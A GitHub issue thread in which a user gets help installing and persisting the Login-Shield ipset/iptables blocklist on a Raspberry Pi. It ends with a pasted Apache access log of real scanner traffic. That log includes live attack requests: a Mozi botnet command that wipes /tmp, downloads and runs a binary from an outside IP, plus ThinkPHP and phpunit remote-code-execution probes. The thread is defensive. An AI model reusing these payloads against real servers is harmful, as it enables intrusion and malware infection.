DPsystems / Login-Shield

Your first line of defense against Internet bots, hacks and probes. Login-Shield is a small set of bash scripts that implements an iptables/ipset blocklist of known sources of hack activity. Works great as a compliment with/without fail2ban. Statistics have shown it blocks 90+% of most system probes and attacks on login ports.
Other
36 stars 6 forks source link

New to Login-Shield, need some help #4

Closed aakerbeere closed 3 years ago

aakerbeere commented 3 years ago

Hi I am trying to set up Login-Shield on RPI4B, 64bit OS, Buster, as suggested at "https://github.com/DPsystems/Login-Shield/blob/master/INSTALL". When it comes to "sudo ./blacklist-main-nonUS.sh" i get errors like "./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found" and "./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")". I don't know if it's me doing something wrong or if this is not suitable at all for my needs. thx for helping.

ychaouche commented 3 years ago

24 days; no reply ?

aakerbeere commented 3 years ago

Yes, sadly no reply yet :-(

Am 26. Apr. 2021, 11:59, um 11:59, Yassine Chaouche @.***> schrieb:

24 days; no reply ?

-- You are receiving this because you authored the thread. Reply to this email directly or view it on GitHub: https://github.com/DPsystems/Login-Shield/issues/4#issuecomment-826696056

DPsystems commented 3 years ago

Sorry, I missed this.

The errors you're getting appear to be the result of using the wrong shell. If you're using /bin/sh try /bin/bash or wherever your shell is located.

DPsystems commented 3 years ago

I believe the shell script I am using is bash. run "whereis bash" and then execute that command before running the script like /usr/bin/bash

aakerbeere commented 3 years ago

got it thx

When adding blacklists i get for ex.

" Blacklisting 96.127.128.0/18 ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6 The set with the given name does not exist "

don't know if this is expected.

and when enabling i get

" Running: set-iptables.sh

....

Continue (Y/n)? Yes Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190 iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.

Try `iptables -h' or 'iptables --help' for more information. iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn iptables v1.8.2 (nf_tables): Set login-shield doesn't exist.

Try `iptables -h' or 'iptables --help' for more information. Done. "

Correct?

thx for helping

DPsystems commented 3 years ago

Before setting up iptables, you have to define the ipset lists. there must have been an error initially creating the ipset list? There's a specific order you need to run the commands in.

step 1: create the ipset list step 2: run the blacklist* scripts to add IP to the blacklists step 3: set iptables to use the ipset lists

maybe step 1 wasn't done?

aakerbeere commented 3 years ago

I strictly followed the INSTALL-Instructions. Should i start over?

DPsystems commented 3 years ago

Did you get an error message when running ./create-blacklist.sh?

Do you have ipset installed?

What do you get when you run the command: ipset list | grep -i name ?

There should be a set called "login-shield".

If there isn't something is going wrong creating the ipset list.

aakerbeere commented 3 years ago

Did you get an error message when running ./create-blacklist.sh? I don't remember. I would say no. Otherwise i would have been looking for it. Can i run the script again?

ipset/stable,now 6.38-1.2 arm64 [installed]

ipset list | grep -i name ipset v6.38: Kernel error received: Operation not permitted ***@:~ $ sudo ipset list | grep -i name ->empty output

many tanks for helping. I appreciate.

aakerbeere commented 3 years ago

Should i try to run all this being root, not only sudo?

DPsystems commented 3 years ago

yes, all this stuff needs to be run as root

DPsystems commented 3 years ago

By the way, when you run into stuff like this, be sure to identify what OS/version you're running.

DPsystems commented 3 years ago

The command (as root) you want to execute is:

ipset -exist create login-shield hash:net

It looks like the ipset list isn't being created for some reason.

ychaouche commented 3 years ago

@DPsystems did you pay attention to this error message ?

ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6

reference : https://github.com/DPsystems/Login-Shield/issues/4#issuecomment-827621709

aakerbeere commented 3 years ago

Yes i did. Couldn't find helpful information about this yet. I actually don't know how to proceed. thx

ychaouche commented 3 years ago

@aakerbeere it seems you have a version mismatch between what is supported in your kernel and what is used in the tools (ipset and/or iptables). Either a kernel upgrade or an application downgrade would be a possible solution.

aakerbeere commented 3 years ago

thx DPsystems and ychaouche

I finally started over by running all the scripts from the INSTALL-Instructions as root, not only sudo. This seems to have done it:

" Continue (Y/n)? Yes Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190 iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn "

and as well

" ipset list | grep -i name Name: login-shield "

Happy now. Many thanks.

ychaouche commented 3 years ago

There could have been a system update in the meantime that resolved the problem. Anyway, happy to hear it's working for you :)

aakerbeere commented 3 years ago

One question remaining from INSTALL-Instructions: "NOTE: This is not persistent unless you make it persistent." and "If you want to set up login-shield to run automatically at boot time, that's beyond the scope of this guide. But it's obviously not terribly difficult to do."

Does this mean "set-iptables.sh" has to be run at boot. If i'm right i will set up a crontab entry.

thx

ychaouche commented 3 years ago

You should run create-blacklist.sh, any number of blacklist-* scripts of your choice, and set-iptables.sh, in that order. You can put those in a single script and run that instead.

$ cat loginshield.sh 
sudo ./create-blacklist.sh 
# any number of these below
# sudo ./blacklist-main-nonUS.sh
# sudo ./blacklist-others.sh
# sudo./blacklist-proxies.sh
# sudo ./blacklist-US-hosting.sh
sudo ./set-iptables.sh
$ 

You can either create a crontab entry for you script with the special @reboot time specification (not supported by all crontab versions), or simply call your script from /etc/rc.local which is executed after booting.

SomePersonSomeWhereInTheWorld commented 3 years ago

sudo ./create-blacklist.sh any number of these below sudo ./blacklist-main-nonUS.sh sudo ./blacklist-others.sh sudo./blacklist-proxies.sh sudo ./blacklist-US-hosting.sh sudo ./set-iptables.sh

Well you need to reference the full path to these files and then you have to create a way to automatically respond with "yes".

ychaouche commented 3 years ago

Maybe

sudo echo yes | /path/to/create-blacklist.sh
sudo echo yes | /path/to/blacklist-main-nonUS.sh
sudo echo yes | /path/to/blacklist-others.sh
sudo echo yes | /path/to/blacklist-proxies.sh
sudo echo yes | /path/to/blacklist-US-hosting.sh
sudo echo yes | /path/to/set-iptables.sh

(not tested)

aakerbeere commented 3 years ago

sry RobbieTheK

I accidentally submitted the comment.

thx ychaouche

I attempted to set it up using crontab. It didnt work. Probably raspberrys crontab does not support code>@reboot</code. So i set up "rc.local". Actually the script looks like this:

#!/bin/sh -e
cd /usr/local/bin/Login-Shield-master
echo | ./create-blacklist.sh
echo | ./blacklist-main-nonUS.sh
echo | ./blacklist-others.sh
echo | ./blacklist-proxies.sh
echo | ./blacklist-US-hosting.sh
echo | ./set-iptables.sh
exit 0

Because the scripts affected need confirmation to continue, i needed each appropriate call to be preceded by "echo | ". After reboot:

ipset list | grep -i name
Name: login-shield

So successfully set up "Login-Shield" or allways missing something?

Thx to all spending time to help me.

ychaouche commented 3 years ago

You should be good I guess. I don't know If this is also another good way to check :

iptables -L --match-set login-shield

Where login-shield rules should be listed.

aakerbeere commented 3 years ago

Raspberry must be using a different package. I get

iptables v1.8.2 (nf_tables): unknown option "--match-set"

SomePersonSomeWhereInTheWorld commented 3 years ago

sudo echo yes | /path/to/create-blacklist.sh sudo echo yes | /path/to/blacklist-main-nonUS.sh sudo echo yes | /path/to/blacklist-others.sh sudo echo yes | /path/to/blacklist-proxies.sh sudo echo yes | /path/to/blacklist-US-hosting.sh sudo echo yes | /path/to/set-iptables.sh

Well you have to then edit each blacklist script with the correct/full path to the respective ipset script otherwise you get:

#######
#
Adding ./ipset-main-nonUS.lst to the login-shield blacklist, which contains cat: ./ipset-main-nonUS.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-main-nonUS.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-main-nonUS.sh: line 56: ./ipset-main-nonUS.lst: No such file or directory
## end.
#######
#
Adding ./ipset-others.lst to the login-shield blacklist, which contains cat: ./ipset-others.lst: No such file or directory
0 IP blocks.
head: cannot open './ipset-others.lst' for reading: No such file or directory
Yes
/root/Login-Shield/blacklist-others.sh: line 54: ./ipset-others.lst: No such file or directory
DPsystems commented 3 years ago

Thanks for helping diagnose this!

Yes, basically login-shield is manually enabled by default. I don't have it set up to automatically run when the server reboots. Since this is a system that has the potential to lock you out of remote server access, I feel by default I shouldn't hook it into startup, but once you test the system and make sure the blacklists you use are acceptable, then you can automate the process. I tend to manually reboot my servers, so I manually re-run the commands. I still consider the system in beta right now so it needs a bit more polish but really appreciate everybody helping!

aakerbeere commented 3 years ago

Having some doubt i did some further investigation and found

systemctl status rc-local.service
● rc-local.service - /etc/rc.local Compatibility
   Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
  Drop-In: /lib/systemd/system/rc-local.service.d
           └─debian.conf
           /etc/systemd/system/rc-local.service.d
           └─ttyoutput.conf
   Active: failed (Result: exit-code) since Wed 2021-04-28 21:04:36 CEST; 30s ago
  Process: 3556 ExecStart=/etc/rc.local start (code=exited, status=2)

Apr 28 21:04:36 rpi4nc systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 rpi4nc rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" une
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 rpi4nc systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 rpi4nc systemd[1]: Failed to start /etc/rc.local Compatibility.

and in "syslog"

Apr 28 21:04:36 localhost systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found
Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Control process exited, code=exited, status=2/INVALIDARGUMENT
Apr 28 21:04:36 localhost systemd[1]: rc-local.service: Failed with result 'exit-code'.
Apr 28 21:04:36 localhost systemd[1]: Failed to start /etc/rc.local Compatibility.

So this does not seem to run as expected.

SomePersonSomeWhereInTheWorld commented 3 years ago

Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 9: ./blacklist-main-nonUS.sh: [[: not found Apr 28 21:04:36 localhost rc.local[3556]: ./blacklist-main-nonUS.sh: 15: ./blacklist-main-nonUS.sh: Syntax error: "(" unexpected (expecting "then")

Put the full path to the file, e.g., echo yes | /root/Login-Shieild/blacklist-main-nonUS.sh

DPsystems commented 3 years ago

Looks like a shell/reference issue. I believe the scripts were written using bash.

aakerbeere commented 3 years ago

I did some changes to "/etc/rc.local":

#!/bin/bash
cd /usr/local/bin/Login-Shield-master
/usr/local/bin/Login-Shield-master/create-blacklist.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-main-nonUS.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-others.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-proxies.sh
echo | /usr/local/bin/Login-Shield-master/blacklist-US-hosting.sh
echo | /usr/local/bin/Login-Shield-master/set-iptables.sh
exit 0

then i get

# systemctl status rc-local.service
Warning: The unit file, source configuration file or drop-ins of rc-local.service changed on disk. Run 'systemctl daemon-reload' to reload units.
● rc-local.service - /etc/rc.local Compatibility
   Loaded: loaded (/etc/systemd/system/rc-local.service; enabled-runtime; vendor preset: enabled)
  Drop-In: /lib/systemd/system/rc-local.service.d
           └─debian.conf
           /etc/systemd/system/rc-local.service.d
           └─ttyoutput.conf
   Active: active (exited) since Wed 2021-04-28 22:04:39 CEST; 37s ago
  Process: 667 ExecStart=/etc/rc.local start (code=exited, status=0/SUCCESS)

Apr 28 22:04:37 ****** systemd[1]: Starting /etc/rc.local Compatibility...
Apr 28 22:04:38 ****** rc.local[667]: ipset v6.38: Kernel support protocol versions 6-7 while userspace supports protocol versions 6-6
Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added
Apr 28 22:04:39 ****** systemd[1]: Started /etc/rc.local Compatibility.

When doing systemctl daemon-reload the warning disapears but does not survive reboot. And again there is a strange Kernel support protocol versions confusion.

aakerbeere commented 3 years ago

So i configured this as a service. After reboot i get

# systemctl status loginshield.service
● loginshield.service - Login-Shield service
   Loaded: loaded (/etc/systemd/system/loginshield.service; enabled; vendor preset: enabled)
   Active: inactive (dead) since Wed 2021-04-28 23:37:56 CEST; 49s ago
  Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
 Main PID: 655 (code=exited, status=0/SUCCESS)

Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #  This script will enable the LOGIN-SHIELD IP blacklist via IPTABLES
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: # WARNING:  This can cause you to lose connectivity to your server if not properly configured!
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: #
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Yes
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: Setting IPTABLES using ipset blacklist: login-shield for ports: 20,21,22,110,143,587,989,990,993,994,995,4190
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j DROP
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: iptables -I INPUT -p tcp --match multiport --dports 20,21,22,110,143,587,989,990,993,994,995,4190 -m set --match-set login-shield src -j LOG --log-prefix ShD-Lgn
Apr 28 23:37:56 rpi4nc loginshield.sh[655]: ## Done.
Apr 28 23:37:56 rpi4nc systemd[1]: loginshield.service: Succeeded.

I guess the inactive (dead) output is expected because the script comes to a successfull end and then terminates and nothing more to do.

Maybe successful this time?

DPsystems commented 3 years ago

I don't know. I've never configured it as a service before. sounds interesting.. let us know how it works!

ychaouche commented 3 years ago

Status=0/SUCCESS

  Process: 655 ExecStart=/usr/local/bin/Login-Shield-master/loginshield.sh (code=exited, status=0/SUCCESS)
 Main PID: 655 (code=exited, status=0/SUCCESS)

Also pay attention to this line :

Apr 28 22:04:38 ****** rc.local[667]: Element cannot be added to the set: it's already added

This probably means you have run the script once and it succeeded adding the ruleset, then you ran it again ? I don't know if @DPsystems has code to detect that, on the other hand maybe the consequences aren't so important and can be safely ignored. But it's always better to have a clean, deterministic and consistent way to run the script, i.e we should be covering as much cases and outcomes as possible.

aakerbeere commented 3 years ago

@ychaouche: Because i was looking for a way to have this done automatically at boot time, the scripts have been run mutiple times. So, this was expected.

@DPsystems: Raspberry Pi Documentation indicates some possible drawbacks that i was probably suffering from when trying "rc.local"-method. As well there i found the hint for the "systemd"-method. With this i don't have any of the issues i got before with "rc.local".

But even if this is running without errors, i don't know if iptables does some blocking. Can i verify somehow, f. ex. logfiles?

thx for spending time. I appreciate.

ychaouche commented 3 years ago

The set-iptables.sh script has already the necessary LOG instructions

[...]
LOG_PREFIX="ShD-Lgn"
[...]
  echo "iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX"
  # optional command to LOG dropped connections via the kern.warning syslog service.  Comment out the iptables to disable
  iptables -I INPUT -p tcp --match multiport --dports $BLOCK_PORTS -m set --match-set $SET_NAME src -j LOG --log-prefix $LOG_PREFIX

You should look for syslog lines prefixed with ShD-Lgn

$ grep ShD-Lgn /var/log/syslog

aakerbeere commented 3 years ago

thx Nothing yet. I will report.

ychaouche commented 3 years ago

Is this device running any popular web-facing services ? (ssh, ftp, imap, pop3, smtp, http, https)

aakerbeere commented 3 years ago

Yes, private Cloud. ssh, https

DPsystems commented 3 years ago

By default, the system logs all blocks. There are two shell scripts that will report on the status of things if properly configured to look in the appropriate logs (see attack_stats.sh and count_logins.sh)

aakerbeere commented 3 years ago

thx

$ sudo /usr/local/bin/Login-Shield-master/attack_stats.sh
...
======= Attack Statistics based on current log files =======
 Using: /var/log/messages Key: ShD-

From: Apr 25 00:00:06
To  : Apr 30 19:10:45

-- Number of blocked attacks in log files  : 0
-- Number of unique IP addresses attacking : 0
   Average # of attacks per IP             : -2147483647
   Percentage of attacks from top 50 IPs   : nan%
   Percentage of attacks from top 10 IPs   : nan%
   Percentage of attacks from top 5 IPs    : nan%

      Top 20:
Attacks:  IP Address:
---------------------

$ sudo /usr/local/bin/Login-Shield-master/count_logins.sh

...

============= Login-Shield Statistics based on current log files ===========
 Using: /var/log/messages and /var/log/secure
-- Number of login failures in log files: 0
Start: End  : ===================================== 
--        Number of filtered connections: 0
Start: Apr 25 00:00:06 localhost rsyslogd:  [origin software="rsyslogd" swVersion="8.1901.0" x-pid="442" x-info="https://www.rsyslog.com"] rsyslogd was HUPed
End  : Apr 30 19:14:55 localhost kernel: [25003.117303] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:00:08:9b:c5:82:77:08:00 SRC=192.168.1.10 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0xC0 TTL=1 ID=0 DF PROTO=2 
============================================================================
Total system attacks: 0
Blocked attempts    : 0
Attacks got through : 0
---------------------------------
% Of Attacks Blocked: 100% 
============================================================================
            
DPsystems commented 3 years ago

Hmmm, make sure there are log entries in the file it's looking for (and that the prefix "ShD" is prepended to those entries according to the iptables command - I've only tested this under CentOS 7 so the logging may be slightly different for other OSes. I guess it's also possible that different systems will also log failed logins differently than what I might have in the script.

aakerbeere commented 3 years ago

Thank you DPsystems

"/var/log/messages" was already present but no entries with 'ShD'-prefix, "/var/log/secure" was not. I created it (actually empty). Login attempts are recorded in '/var/log/auth.log'

aakerbeere commented 3 years ago

I realized creating "/var/log/secure" was useless.

aakerbeere commented 3 years ago

I actually discovered plenty of connections in "/var/log/apache2/other_vhosts_access.log"

<sld>.<tld>:80 3.14.72.59 - - [01/May/2021:00:22:42 +0200] "GET / HTTP/1.1" 400 0 "-" "-"
<sld>.<tld>:80 89.163.146.178 - - [01/May/2021:00:37:36 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
<sld>.<tld>:80 193.46.255.97 - - [01/May/2021:01:10:42 +0200] "HEAD /robots.txt HTTP/1.0" 301 351 "-" "-"
<sld>.<tld>:80 89.238.223.30 - - [01/May/2021:01:22:43 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
<sld>.<tld>:80 167.99.186.47 - - [01/May/2021:01:27:11 +0200] "GET /.env HTTP/1.1" 301 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
<sld>.<tld>:80 138.197.122.201 - - [01/May/2021:01:30:17 +0200] "GET / HTTP/1.1" 301 657 "-" "curl/7.58.0"
<sld>.<tld>:80 178.72.68.214 - - [01/May/2021:02:01:36 +0200] "POST /HNAP1/ HTTP/1.0" 301 688 "-" "-"
<sld>.<tld>:80 89.248.165.182 - - [01/May/2021:02:03:55 +0200] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 301 726 "-" "libwww-perl/6.46"
<sld>.<tld>:80 128.14.133.58 - - [01/May/2021:02:07:27 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /api/jsonws/invoke HTTP/1.1" 301 710 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 912 "-" "Mozilla/5.0 (Windows NT 10.0; Wi$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 736 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 301 766 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 734 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.39$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:16 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 776 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.390$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 301 736 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /console/ HTTP/1.1" 301 692 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:17 +0200] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 796 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3$
<sld>.<tld>:80 45.155.205.84 - - [01/May/2021:02:23:18 +0200] "GET /_ignition/execute-solution HTTP/1.1" 301 728 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
<sld>.<tld>:80 209.141.51.242 - - [01/May/2021:02:43:12 +0200] "GET /config/getuser?index=0 HTTP/1.1" 301 720 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
<sld>.<tld>:80 162.62.133.40 - - [01/May/2021:03:42:03 +0200] "GET / HTTP/1.1" 301 676 "-" "-"
<sld>.<tld>:80 162.62.133.40 - - [01/May/2021:03:42:13 +0200] "GET / HTTP/1.0" 301 676 "-" "-"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:25 +0200] "POST /_ignition/execute-solution HTTP/1.1" 301 709 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:26 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 757 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:28 +0200] "GET /login HTTP/1.1" 301 667 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:29 +0200] "GET /jenkins/login HTTP/1.1" 301 683 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:30 +0200] "GET /manager/html HTTP/1.1" 301 681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:31 +0200] "GET /wp-login.php HTTP/1.1" 301 681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0"
<sld>.<tld>:80 104.131.166.216 - - [01/May/2021:03:57:33 +0200] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1" 301 875 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X $
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:11:39 +0200] "GET / HTTP/1.1" 301 713 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:11:56 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
<sld>.<tld>:80 183.136.225.14 - - [01/May/2021:04:12:17 +0200] "GET /favicon.ico HTTP/1.1" 301 698 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
<sld>.<tld>:80 202.150.149.82 - - [01/May/2021:05:22:59 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
<sld>.<tld>:80 84.232.147.190 - - [01/May/2021:06:03:48 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
<sld>.<tld>:80 128.14.134.170 - - [01/May/2021:06:42:01 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
<sld>.<tld>:80 209.141.33.74 - - [01/May/2021:07:38:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 301 759 "http://84.75.144.173:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
<sld>.<tld>:80 192.227.137.68 - - [01/May/2021:07:53:36 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
<sld>.<tld>:80 61.3.149.229 - - [01/May/2021:09:14:50 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://61.3.149.229:40707/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 901 "-" "Hello, world"
<sld>.<tld>:80 51.254.59.113 - - [01/May/2021:10:10:01 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
<sld>.<tld>:80 180.149.125.175 - - [01/May/2021:11:23:31 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
<sld>.<tld>:80 192.241.219.233 - - [01/May/2021:11:53:44 +0200] "GET / HTTP/1.1" 301 657 "-" "Mozilla/5.0 zgrab/0.x"
<sld>.<tld>:80 54.70.40.11 - - [01/May/2021:12:01:59 +0200] "GET /robots.txt HTTP/1.1" 301 674 "-" "Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)"
<sld>.<tld>:80 54.70.40.11 - - [01/May/2021:12:02:19 +0200] "GET /robots.txt HTTP/1.1" 301 682 "-" "Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)"
<sld>.<tld>:80 209.141.33.74 - - [01/May/2021:12:27:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 301 759 "http://84.75.144.173:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
<sld>.<tld>:80 80.82.78.39 - - [01/May/2021:12:40:37 +0200] "GET / HTTP/1.1" 301 676 "-" "Mozilla/5.0"
<sld>.<tld>:80 80.82.78.39 - - [01/May/2021:12:40:53 +0200] "\x16\x03\x01" 400 0 "-" "-"
